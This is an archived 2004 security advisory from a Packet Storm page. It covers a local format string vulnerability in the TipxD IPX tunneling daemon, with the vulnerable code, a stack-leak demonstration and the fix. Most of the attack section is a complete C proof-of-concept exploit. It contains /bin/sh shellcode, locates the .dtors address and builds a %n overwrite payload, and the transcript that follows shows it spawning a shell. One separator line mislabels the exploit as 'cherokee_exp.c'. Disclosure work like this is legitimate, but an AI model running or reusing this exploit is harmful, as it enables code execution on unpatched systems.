exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

nsg-advisory-08.txt

nsg-advisory-08.txt
Posted Nov 20, 2004
Authored by CoKi | Site nosystem.com.ar

TipxD versions 1.1.1 and below suffer from a local format string vulnerability. Proof of concept local exploit included.

tags | exploit, local, proof of concept
SHA-256 | bd7c3d962bfd392f9d0af4f86b1f47acbfce58b9232069d15848c54ccdb24870

nsg-advisory-08.txt

Change Mirror Download
-------------------------------------------------
No System Group - Advisory #03 - 15/11/04
-------------------------------------------------
Program: Tom's IPX Tunneling Daemon - TipxD
Homepage: http://tipxd.sourceforge.net
Vulnerable Versions: TipxD 1.1.1 and prior
Risk: Low
Impact: Local Format String Vulnerability
-------------------------------------------------


- DESCRIPTION
-------------------------------------------------
tipxd is an IPX tunneling daemon which snoops on
a local network for IPX 802.3 traffic, packages
it and sends it over one or many TCP/IP connections
to tipxd running on remote machines where it is
unpacked and sent via the local network. To the
IPX networks, it then appears that the LANs are
joined. This is a request for testing and big-finding.
It is intended for playing IPX based games where
the remote machines are joined only by a TCP/IP
network, and typically when the the gaming machines
are each behind a firewall.

More informations at: http://tipxd.sourceforge.net


- DETAILS
-------------------------------------------------
tipxd is affected by a format string bug in the
tipxd_log() function to 61 lines of src/log.c code:

--- log.c ---
45: void tipxd_log(int priority, char *format, ... )
46: {
47: va_list ap;
48: char log_entry[LOG_ENTRY_SIZE];
49:
50: /* Take the format and variables and expand them out into a string,
51: so that we can pass it on to syslog if necessary. No buffer overflow,
52: aren't I good? :)
53: */
54: va_start(ap,format);
55: vsnprintf(log_entry,LOG_ENTRY_SIZE-1,format,ap);
56:
57: if (sysinfo.opt_flags & OPT_STDERR) {
58: /* To do: add something useful like timestamping instead of silly pre-identifie
59: fprintf(stderr,"[TIPXD LOG] %s\n",log_entry);
60: } else {
61: syslog(priority,log_entry); // The format bug
62: }
63:
64: return;
65: }
--- log.c ---

We can show some parts of the stack memory by using a format string loke
this:

coki@servidor:~$ tipxd -C AAAA%08x
Unable to open configuration file : No such file or directory

coki@servidor:~$ tail -n 1 /var/log/messages
Nov 15 11:03:40 servidor tipxd[8360]: Config file is AAAA0804c8d7
coki@servidor:~$


- EXPLOIT
-------------------------------------------------

------------------ tipxd_exp.c ------------------
/* tipxd_exp.c

TipxD Format String Vulnerability

TipxD <= 1.1.1 local exploit (Proof of Concept)

Tested in Slackware 9.0 / 9.1 / 10.0

by CoKi <coki@nosystem.com.ar>
No System Group - http://www.nosystem.com.ar
*/

#include <stdio.h>
#include <string.h>

#define PATH "/bin/tipxd"
#define OBJDUMP "/usr/bin/objdump"
#define GREP "/usr/bin/grep"

unsigned char shellcode[]= /* aleph1 shellcode.45b */
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c"
"\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
"\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff\x2f\x62\x69\x6e"
"\x2f\x73\x68";

int check(unsigned long addr);

int main(int argc, char *argv[]) {

int i, dtorsaddr;
unsigned int bal1, bal2, bal3, bal4;
char temp[512];
char buffer[1024];
char nop1[255], nop2[255];
char nop3[255], nop4[255];
int cn1, cn2, cn3, cn4;
FILE *f;
char *env[3] = {shellcode, NULL};
int shaddr = 0xbffffffa - strlen(shellcode) - strlen(PATH);

/* finding .dtors address */
sprintf(temp, "%s -s -j .dtors %s | %s ffffffff", OBJDUMP, PATH, GREP);
f = popen(temp, "r");
if(fscanf(f, " %08x", &dtorsaddr) != 1) {
pclose(f);
printf("Cannot find .dtors address\n");
exit(1);
}
pclose(f);
dtorsaddr = dtorsaddr + 4;

printf("\n TipxD <= 1.1.1 local exploit (Proof of Concept)\n");
printf(" by CoKi <coki@nosystem.com.ar>\n\n");
printf(" shellcode address = %.8p\n", shaddr);
printf(" .dtors address = %.8p\n\n", dtorsaddr);

bzero(temp, sizeof(temp));
bzero(buffer, sizeof(buffer));

strcat(buffer, "x");

/* adding .dtors address */
for(i = 0; i < 4; i++) {
bzero(temp, sizeof(temp));
sprintf(temp, "%s", &dtorsaddr);
strncat(buffer, temp, 4);
dtorsaddr++;
}

/* convert shellcode address location */
memset(nop1, 0, 255);
memset(nop2, 0, 255);
memset(nop3, 0, 255);
memset(nop4, 0, 255);

bal1 = (shaddr & 0xff000000) >> 24;
bal2 = (shaddr & 0x00ff0000) >> 16;
bal3 = (shaddr & 0x0000ff00) >> 8;
bal4 = (shaddr & 0x000000ff);

cn1 = bal4 - 16 - 15 - 48 - 2 -1;
cn1 = check(cn1);
cn2 = bal3 - bal4 - 2;
cn2 = check(cn2);
cn3 = bal2 - bal3 - 2;
cn3 = check(cn3);
cn4 = bal1 - bal2 - 2;
cn4 = check(cn4);

memset(nop1, '\x90', cn1);
memset(nop2, '\x90', cn2);
memset(nop3, '\x90', cn3);
memset(nop4, '\x90', cn4);

sprintf(temp, "%%08x%%08x%%08x%%08x%%08x%%08x"
"%s\xeb\x02%%n"
"%s\xeb\x02%%n"
"%s\xeb\x02%%n"
"%s\xeb\x02%%n\x90\x90\x90\x90"
,nop1, nop2, nop3, nop4);

strcat(buffer, temp);

execle(PATH, "tipxd", "-f", buffer, NULL, env);
}

int check(unsigned long addr) {
char tmp[128];
snprintf(tmp, sizeof(tmp), "%d", addr);
if(atoi(tmp) < 1)
addr = addr + 256;

return addr;
}

---------------- cherokee_exp.c -----------------

coki@servidor:~$ make tipxd_exp
coki@servidor:~$ ./tipxd_exp

tipxd local exploit (Proof of Concept)
by CoKi <coki@nosystem.com.ar>

shellcode address = 0xbfffffa7
.dtors address = 0x0804fbe0

Unable to open configuration file : File name too long

sh-2.05b$

This exploit does not give a root shell :(


- SOLUTIONS
-------------------------------------------------
Change the tipxd_log() function of src/log.c code:

--- log.c ---
45: void tipxd_log(int priority, char *format, ... )
46: {
47: va_list ap;
48: char log_entry[LOG_ENTRY_SIZE];
49:
50: /* Take the format and variables and expand them out into a string,
51: so that we can pass it on to syslog if necessary. No buffer overflow,
52: aren't I good? :)
53: */
54: va_start(ap,format);
55: vsnprintf(log_entry,LOG_ENTRY_SIZE-1,format,ap);
56:
57: if (sysinfo.opt_flags & OPT_STDERR) {
58: /* To do: add something useful like timestamping instead of silly pre-identifie
59: fprintf(stderr,"[TIPXD LOG] %s\n",log_entry);
60: } else {
61: syslog(priority,"%s",log_entry); // The fix
62: }
63:
64: return;
65: }
--- log.c ---


- REFERENCES
-------------------------------------------------
http://www.nosystem.com.ar/advisories/advisory-08.txt


- CREDITS
-------------------------------------------------
Discovered by CoKi <coki@nosystem.com.ar>

No System Group - http://www.nosystem.com.ar
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close